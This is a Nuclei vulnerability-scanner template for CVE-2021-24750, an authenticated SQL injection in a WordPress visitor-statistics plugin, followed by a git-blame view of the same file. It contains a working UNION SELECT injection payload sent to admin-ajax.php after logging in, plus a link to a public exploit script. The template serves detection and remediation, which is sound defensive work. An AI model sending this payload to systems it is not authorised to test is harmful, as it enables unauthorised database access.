nuclei-templates/http/cves/2021/CVE-2021-24750.yaml

id: CVE-2021-24750

info:
  name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
  author: cckuakilong
  severity: high
  description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
  remediation: |
    Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.
  reference:
    - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
    - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
    - https://plugins.trac.wordpress.org/changeset/2622268
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24750
    cwe-id: CWE-89
    epss-score: 0.00791
    epss-percentile: 0.79488
    cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wp_visitor_statistics_\(real_time_traffic\)_project
    product: wp_visitor_statistics_\(real_time_traffic\)
    framework: wordpress
  tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202d85c7eac7342622bd0be46896a70a947c762286b62be4878290f24a49360d16022100dfcd7408d4c9436a855b86ecd8e874e7afa03696c9e1b50640f25dcc72410840:922c64590222798bb761d5b6d8e72950
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`id: CVE-2021-24750`

			`info:`
Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo <sullo@cirt.net> 2022-06-25 07:14:58 +00:00			`name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`author: cckuakilong`
			`severity: high`
Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo <sullo@cirt.net> 2022-06-25 07:14:58 +00:00			`description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`reference:`
			`- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de`
			`- https://plugins.trac.wordpress.org/changeset/2622268`
Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo <sullo@cirt.net> 2022-06-25 07:14:58 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24750`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2021-24750`
			`cwe-id: CWE-89`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.00791`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`epss-percentile: 0.79488`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\)::::::wordpress::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: wp_visitor_statistics_\(real_time_traffic\)_project`
			`product: wp_visitor_statistics_\(real_time_traffic\)`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`framework: wordpress`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin`
Update CVE-2021-24750.yaml 2022-06-30 03:50:00 +00:00			`variables:`
			`num: "999999999"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2021-24750.yaml 2022-01-23 09:21:25 +00:00			`Origin: {{RootURL}}`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`Content-Type: application/x-www-form-urlencoded`
			`Cookie: wordpress_test_cookie=WP%20Cookie%20check`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1`
			`- \|`
Update CVE-2021-24750.yaml 2022-06-30 03:50:00 +00:00			`GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`Host: {{Hostname}}`

			`cookie-reuse: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2021-24750.yaml 2022-06-30 03:50:00 +00:00			`- '{{md5({{num}})}}'`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00
			`- type: status`
			`status:`
Update CVE-2021-24750.yaml 2022-01-23 09:08:12 +00:00			`- 200`
Auto Template Signing [Thu Nov 9 08:56:13 UTC 2023] :robot: 2023-11-09 08:56:13 +00:00			`# digest: 4a0a0047304502202d85c7eac7342622bd0be46896a70a947c762286b62be4878290f24a49360d16022100dfcd7408d4c9436a855b86ecd8e874e7afa03696c9e1b50640f25dcc72410840:922c64590222798bb761d5b6d8e72950`